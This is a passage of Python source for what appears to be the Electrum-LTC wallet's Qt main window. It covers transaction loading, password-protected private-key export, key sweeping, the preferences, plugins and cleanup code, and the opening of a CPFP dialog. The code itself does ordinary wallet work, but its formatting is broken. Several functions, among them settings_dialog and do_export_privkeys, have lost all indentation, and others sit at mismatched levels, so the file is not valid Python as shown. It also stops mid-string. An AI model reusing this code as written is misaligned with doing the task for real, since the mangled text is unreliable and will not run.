        hbox.addWidget(b)
        layout.addLayout(hbox, 4, 1)
        d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
    def tx_from_text(self, txt):
        """Parse *txt* as a serialized transaction.

        Returns a Transaction, or None after showing an error dialog.
        """
        from electrum_ltc.transaction import tx_from_str
        try:
            tx = tx_from_str(txt)
            return Transaction(tx)
        except BaseException as e:
            self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
            return
    def read_tx_from_qrcode(self):
        """Scan a QR code from the configured camera.

        A 'litecoin:' URI goes to the send tab; anything else is treated as
        a base43-encoded raw transaction and shown in the tx dialog.
        """
        from electrum_ltc import qrscanner
        try:
            data = qrscanner.scan_barcode(self.config.get_video_device())
        except BaseException as e:
            self.show_error(repr(e))
            return
        if not data:
            return
        # if the user scanned a bitcoin URI
        if str(data).startswith("litecoin:"):
            self.pay_to_URI(data)
            return
        # else if the user scanned an offline signed tx
        try:
            data = bh2u(bitcoin.base_decode(data, length=None, base=43))
        except BaseException as e:
            self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
            return
        tx = self.tx_from_text(data)
        if not tx:
            return
        self.show_transaction(tx)
    def read_tx_from_file(self):
        """Load a transaction from a user-chosen .txn file.

        Returns a Transaction, or None (cancel / unreadable file).
        """
        fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
        if not fileName:
            return
        try:
            with open(fileName, "r") as f:
                file_content = f.read()
        except (ValueError, IOError, os.error) as reason:
            self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
            return
        return self.tx_from_text(file_content)
    def do_process_from_text(self):
        """Prompt for a raw transaction and display it if it parses."""
        text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
        if not text:
            return
        tx = self.tx_from_text(text)
        if tx:
            self.show_transaction(tx)
    def do_process_from_file(self):
        """Load a transaction from a file and display it if it parses."""
        tx = self.read_tx_from_file()
        if tx:
            self.show_transaction(tx)
    def do_process_from_txid(self):
        """Prompt for a txid, fetch the raw tx from the network, and show it."""
        from electrum_ltc import transaction
        txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
        if ok and txid:
            txid = str(txid).strip()
            try:
                # blocking call dispatched to the network thread's event loop
                raw_tx = self.network.run_from_another_thread(
                    self.network.get_transaction(txid, timeout=10))
            except Exception as e:
                self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
                return
            tx = transaction.Transaction(raw_tx)
            self.show_transaction(tx)
    @protected
    def export_privkeys_dialog(self, password):
        """Export all wallet private keys to a CSV/JSON file.

        Keys are derived in a background thread (one address at a time) while
        the dialog shows progress via computing_privkeys_signal;
        show_privkeys_signal fills the text box when done. Decorated with
        @protected: *password* is supplied by the decorator.
        """
        if self.wallet.is_watching_only():
            self.show_message(_("This is a watching-only wallet"))
            return
        if isinstance(self.wallet, Multisig_Wallet):
            self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                              _('It cannot be "backed up" by simply exporting these private keys.'))
        d = WindowModalDialog(self, _('Private keys'))
        d.setMinimumSize(980, 300)
        vbox = QVBoxLayout(d)
        msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                              _("Exposing a single private key can compromise your entire wallet!"),
                              _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
        vbox.addWidget(QLabel(msg))
        e = QTextEdit()
        e.setReadOnly(True)
        vbox.addWidget(e)
        defaultname = 'electrum-ltc-private-keys.csv'
        select_msg = _('Select file to export your private keys to')
        hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
        vbox.addLayout(hbox)
        b = OkButton(d, _('Export'))
        b.setEnabled(False)
        vbox.addLayout(Buttons(CancelButton(d), b))
        private_keys = {}
        addresses = self.wallet.get_addresses()
        # shared state between GUI thread and worker thread
        done = False
        cancelled = False
        def privkeys_thread():
            # worker thread: derive one key at a time, notifying the GUI
            for addr in addresses:
                time.sleep(0.1)
                if done or cancelled:
                    break
                privkey = self.wallet.export_private_key(addr, password)[0]
                private_keys[addr] = privkey
                self.computing_privkeys_signal.emit()
            if not cancelled:
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.emit()
        def show_privkeys():
            s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
            e.setText(s)
            b.setEnabled(True)
            self.show_privkeys_signal.disconnect()
            nonlocal done
            done = True
        def on_dialog_closed(*args):
            nonlocal done
            nonlocal cancelled
            if not done:
                # stop the worker and detach the one-shot signal handlers
                cancelled = True
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.disconnect()
        self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
        self.show_privkeys_signal.connect(show_privkeys)
        d.finished.connect(on_dialog_closed)
        threading.Thread(target=privkeys_thread).start()
        if not d.exec_():
            done = True
            return
        filename = filename_e.text()
        if not filename:
            return
        try:
            self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
        except (IOError, os.error) as reason:
            txt = "\n".join([
                _("Electrum was unable to produce a private key-export."),
                str(reason)
            ])
            self.show_critical(txt, title=_("Unable to create csv"))
        except Exception as e:
            self.show_message(repr(e))
            return
        self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
    def do_import_labels(self):
        """Import wallet labels from a user-chosen file, with GUI feedback."""
        def import_labels(path):
            def _validate(data):
                return data  # TODO
            def import_labels_assign(data):
                for key, value in data.items():
                    self.wallet.set_label(key, value)
            import_meta(path, _validate, import_labels_assign)
        def on_import():
            # request a full GUI refresh once the labels are in
            self.need_update.set()
        import_meta_gui(self, _('labels'), import_labels, on_import)
    def do_export_labels(self):
        """Export wallet labels to a user-chosen file, with GUI feedback."""
        def export_labels(filename):
            export_meta(self.wallet.labels, filename)
        export_meta_gui(self, _('labels'), export_labels)
    def sweep_key_dialog(self):
        """Sweep funds from externally supplied private keys into a wallet
        address: collect the keys and destination, then prefill the send tab
        with the sweep transaction's coins."""
        d = WindowModalDialog(self, title=_('Sweep private keys'))
        d.setMinimumSize(600, 300)
        vbox = QVBoxLayout(d)
        hbox_top = QHBoxLayout()
        hbox_top.addWidget(QLabel(_("Enter private keys:")))
        hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        vbox.addLayout(hbox_top)
        keys_e = ScanQRTextEdit(allow_multi=True)
        keys_e.setTabChangesFocus(True)
        vbox.addWidget(keys_e)
        # prefer unused addresses as the sweep destination
        addresses = self.wallet.get_unused_addresses()
        if not addresses:
            try:
                addresses = self.wallet.get_receiving_addresses()
            except AttributeError:
                addresses = self.wallet.get_addresses()
        h, address_e = address_field(addresses)
        vbox.addLayout(h)
        vbox.addStretch(1)
        button = OkButton(d, _('Sweep'))
        vbox.addLayout(Buttons(CancelButton(d), button))
        button.setEnabled(False)
        def get_address():
            # returns the destination address iff the field holds a valid one
            addr = str(address_e.text()).strip()
            if bitcoin.is_address(addr):
                return addr
        def get_pk(*, raise_on_error=False):
            text = str(keys_e.toPlainText())
            return keystore.get_private_keys(text, raise_on_error=raise_on_error)
        def on_edit():
            # enable the Sweep button only when both fields validate
            valid_privkeys = False
            try:
                valid_privkeys = get_pk(raise_on_error=True) is not None
            except Exception as e:
                button.setToolTip(f'{_("Error")}: {repr(e)}')
            else:
                button.setToolTip('')
            button.setEnabled(get_address() is not None and valid_privkeys)
        on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
        keys_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_address)
        on_address(str(address_e.text()))
        if not d.exec_():
            return
        # user pressed "sweep"
        addr = get_address()
        try:
            self.wallet.check_address(addr)
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            raise
        try:
            coins, keypairs = sweep_preparations(get_pk(), self.network)
        except Exception as e:  # FIXME too broad...
            self.show_message(repr(e))
            return
        self.do_clear()
        self.tx_external_keypairs = keypairs
        self.spend_coins(coins)
        self.payto_e.setText(addr)
        self.spend_max()
        self.payto_e.setFrozen(True)
        self.amount_e.setFrozen(True)
        self.warn_if_watching_only()
    def _do_import(self, title, header_layout, func):
        """Generic import dialog: collect whitespace-separated inputs, pass
        them to *func* -> (good_inputs, bad_inputs), and report the first 10
        of each group to the user."""
        text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
        if not text:
            return
        keys = str(text).split()
        good_inputs, bad_inputs = func(keys)
        if good_inputs:
            msg = '\n'.join(good_inputs[:10])
            if len(good_inputs) > 10: msg += '\n...'
            self.show_message(_("The following addresses were added")
                              + f' ({len(good_inputs)}):\n' + msg)
        if bad_inputs:
            msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
            if len(bad_inputs) > 10: msg += '\n...'
            self.show_error(_("The following inputs could not be imported")
                            + f' ({len(bad_inputs)}):\n' + msg)
        self.address_list.update()
        self.history_list.update()
    def import_addresses(self):
        """Import watch-only addresses, if this wallet type allows it."""
        if not self.wallet.can_import_address():
            return
        title, msg = _('Import addresses'), _("Enter addresses")+':'
        self._do_import(title, msg, self.wallet.import_addresses)
    @protected
    def do_import_privkey(self, password):
        """Import WIF private keys into the wallet, if it allows it.

        Decorated with @protected: *password* is supplied by the decorator.
        """
        if not self.wallet.can_import_privkey():
            return
        title = _('Import private keys')
        header_layout = QHBoxLayout()
        header_layout.addWidget(QLabel(_("Enter private keys")+':'))
        header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_ltc.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(bool(self.config.get('show_fee', False)))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = bool(self.config.get('use_rbf', True))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(bool(self.config.get('batch_rbf', False)))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = repr(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 LTC = 1000 mLTC. 1 mLTC = 1000 uLTC. 1 uLTC = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_ltc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(bool(self.config.get('check_updates', False)))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = bool(self.config.get('confirmed_only', False))
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = bool(self.config.get('coin_chooser_output_rounding', False))
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close-event handler: run window cleanup exactly once, then accept."""
    # closeEvent() has been observed to fire twice in rare cases, so the
    # cleaned_up flag keeps clean_up() from running more than once.
    first_close = not self.cleaned_up
    if first_close:
        self.cleaned_up = True
        self.clean_up()
    event.accept()
def clean_up(self):
    """Tear down this wallet window: stop the wallet thread, detach network
    callbacks, persist window geometry and console history, close child
    windows, and unregister from the gui object."""
    self.wallet.thread.stop()
    if self.network:
        # Detach the callbacks this window registered on the network.
        self.network.unregister_callback(self.on_network)
        self.network.unregister_callback(self.on_quotes)
        self.network.unregister_callback(self.on_history)
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        # Only remember explicit geometry; the maximized flag is saved above.
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
        g.width(),g.height()])
    # Keep only the last 50 console entries (the True argument presumably
    # forces an immediate config save — confirm against SimpleConfig.set_key).
    self.config.set_key("console-history", self.console.history[-50:],
    True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    self.gui_object.timer.timeout.disconnect(self.timer_actions)
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Show a modal dialog listing all plugins with an enable checkbox,
    an optional per-plugin settings widget, and a help button each."""
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    # One lazily-created settings widget per plugin name, keyed by name.
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        # Create the widget on first use (only if the plugin wants settings),
        # then enable/disable it to track the plugin's enabled state.
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        # Toggle returns the plugin instance when enabled, None when disabled.
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        if descr.get('registers_keystore'):
            # Keystore plugins (hardware wallets) are managed elsewhere.
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            # Checkbox is usable if the plugin can be loaded, or is loaded
            # and allows the user to disable it.
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
            or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # One broken plugin must not break the whole dialog.
            self.logger.exception(f"cannot display plugin {name}")
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp(self, parent_tx, new_tx):
    """Show a Child-Pays-For-Parent dialog and, on confirmation, build and
    display the child transaction.

    :param parent_tx: unconfirmed transaction to accelerate.
    :param new_tx: draft child transaction spending an output of parent_tx;
        used here for its estimated size and output value.

    Fix: fee_e.get_amount() returns None when the field is empty or
    unparseable; the original code then crashed with a TypeError in
    on_fee_edit (max_fee - None) and after dialog accept (None > max_fee).
    Both sites now treat None as "no value entered".
    """
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    parent_fee = self.wallet.get_tx_fee(parent_tx)
    if parent_fee is None:
        # Without the parent's fee the combined feerate cannot be computed.
        self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
        return
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
